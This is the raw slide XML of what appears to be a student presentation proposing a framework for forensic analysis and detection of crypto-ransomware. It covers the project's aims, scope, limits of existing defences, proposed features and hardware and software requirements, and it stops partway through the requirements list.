              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{1A2A66D5-EEB7-4AD6-AF57-C5C3430B27CE}"/>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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="896960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9733" y="569254"/>
            <a:ext cx="10515600" cy="5546874"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>1.2 Objectives of the Project</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:endParaRPr lang="en-US" sz="2000" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="002060"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Aim </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>of the Project:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:endParaRPr lang="en-US" sz="2000" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="002060"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="2286000" lvl="5" indent="0" algn="just">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>              </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>The primary aim of this project is to develop a comprehensive framework for identification, analysis, and mitigation of crypto-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>ransomware</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t> attacks. By conducting in-depth forensic analysis of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>ransomware</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t> incidents, the project seeks to enhance </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>cybersecurity</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>measures and aid in the investigation of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>ransomware</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> attacks.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="5" algn="just"/>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Tasks and Deliverables:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:endParaRPr lang="en-US" sz="2000" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="002060"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="5"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Conduct forensic analysis of recent </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>ransomware</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> attacks.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="5"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Identify patterns and behaviors of crypto-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>ransomware</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> variants.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="5"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Develop a systematic framework for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>ransomware</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> detection and analysis.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="5"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Produce detailed reports on analysis findings and recommendations for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>cybersecurity</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> enhancement.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="5"/>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:endParaRPr lang="en-US" sz="2000" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="002060"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:endParaRPr lang="en-US" sz="2000" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="002060"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="1371600" lvl="3" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-IN" sz="3600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="object 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{1A2A66D5-EEB7-4AD6-AF57-C5C3430B27CE}"/>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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="559126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265" y="566167"/>
            <a:ext cx="10515600" cy="5567213"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>1.3 Scope of the project</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:endParaRPr lang="en-US" sz="2000" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="002060"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Determining </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Goals:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:endParaRPr lang="en-US" sz="2000" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="002060"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="2286000" lvl="5" indent="0" algn="just">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>	The overarching goal of this project is to conduct a comprehensive analysis of crypto-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>ransomware</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> attacks to strengthen </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>cybersecurity</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> measures and support forensic investigations. This entails developing techniques for timely detection and analysis of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>ransomware</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>, enhancing security protocols, implementing advanced forensic analysis methods, and sharing knowledge and best practices with the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>cybersecurity</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> community. These objectives serve as guiding principles to inform the project's methodologies and frameworks, ultimately aimed at fortifying defenses against </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>ransomware</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> threats and safeguarding digital assets from malicious exploitation.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:endParaRPr lang="en-US" sz="2000" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="002060"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Data &amp; Constraints:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:endParaRPr lang="en-US" sz="2000" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="002060"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="2286000" lvl="5" indent="0" algn="just">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>The project will utilize real-world </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>ransomware</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> incident data for analysis. Constraints include the availability of data, legal and ethical considerations regarding data usage, and limitations of existing forensic analysis tools and techniques.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:endParaRPr lang="en-US" sz="2000" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="002060"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-IN" sz="3600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="object 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{1A2A66D5-EEB7-4AD6-AF57-C5C3430B27CE}"/>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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2206627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43" y="70103"/>
            <a:ext cx="10515600" cy="1325563"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>2. System Analysis</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="657045" y="1204522"/>
            <a:ext cx="10515600" cy="5489575"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="914400" lvl="2" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>2.1 Existing System</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Background &amp; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Literature </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Survey</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="002060"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="1371600" lvl="3" indent="0" algn="just">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>The current state of cyber defense against crypto-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>ransomware</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t> involves a variety of approaches and tools aimed at detection, analysis, and mitigation of such attacks. Existing systems typically rely on signature-based detection methods, heuristic analysis, and behavioral monitoring to identify suspicious activity indicative of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>ransomware</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t> behavior. Additionally, there are specialized forensic tools and techniques employed for post-attack analysis to understand the extent of damage, trace the attack origins, and potentially recover encrypted data. However, these systems often face challenges in keeping pace with evolving </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>ransomware</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t> tactics and encryption methods, highlighting the need for more robust and adaptive solutions to combat this persistent threat.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3" algn="just"/>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Limitations </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>of Existing System</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="002060"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Ineffectiveness against new-generation </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>ransom ware </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>variants.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Limited capability to capture evasion techniques employed by sophisticated </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>ransomware</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> strains.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Challenges in real-time detection and mitigation of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>ransom ware </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>attacks.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1371600" lvl="3" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-IN" sz="2000" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="object 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{1A2A66D5-EEB7-4AD6-AF57-C5C3430B27CE}"/>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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="32127240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343" y="70103"/>
            <a:ext cx="11626969" cy="6352216"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="914400" lvl="2" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-IN" sz="1800" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="002060"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>2.2 Proposed System</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-IN" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="002060"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Advantages </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>of the proposed system:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:endParaRPr lang="en-US" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="002060"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Enhanced detection capabilities using advanced algorithms and machine learning techniques</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Real-time monitoring and response mechanisms for swift mitigation of attacks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Comprehensive forensic analysis for tracing attack origins and gathering evidence</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Seamless integration with existing </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>cybersecurity</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> frameworks and tools</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Promotion of knowledge sharing and collaboration within the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>cybersecurity</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> community</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Customizable alerting and reporting features tailored to the specific needs of organizations</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Scalable architecture capable of handling large volumes of network traffic and data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>User-friendly interface for easy navigation and configuration</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Continuous updates and enhancements based on emerging threat intelligence</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Robust encryption protocols to ensure data integrity and confidentiality</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Compatibility with diverse operating systems and network infrastructures</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:endParaRPr lang="en-IN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-IN" sz="4000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="object 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{1A2A66D5-EEB7-4AD6-AF57-C5C3430B27CE}"/>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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2711381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94" y="284581"/>
            <a:ext cx="10515600" cy="5891931"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>2.3 Software &amp; Hardware Requirements</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="2" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>HARDWARE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>REQUIREMENTS:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:endParaRPr lang="en-IN" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="002060"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0"/>
              <a:t>PROCESSOR    :  Intel </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0" smtClean="0"/>
              <a:t>i3</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0" smtClean="0"/>
              <a:t>	RAM                  :  2 GB</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0"/>
              <a:t>	ROM                  :  20 GB </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:endParaRPr lang="en-IN" sz="2000" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="002060"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:endParaRPr lang="en-IN" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="002060"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="2" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SOFTWARE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>REQUIREMENTS:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:endParaRPr lang="en-IN" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="002060"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0"/>
              <a:t>Operating System : Windows 10/11</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0"/>
              <a:t>	Development Software : Python 3.10</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0"/>
              <a:t>	Programming Language : Python</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
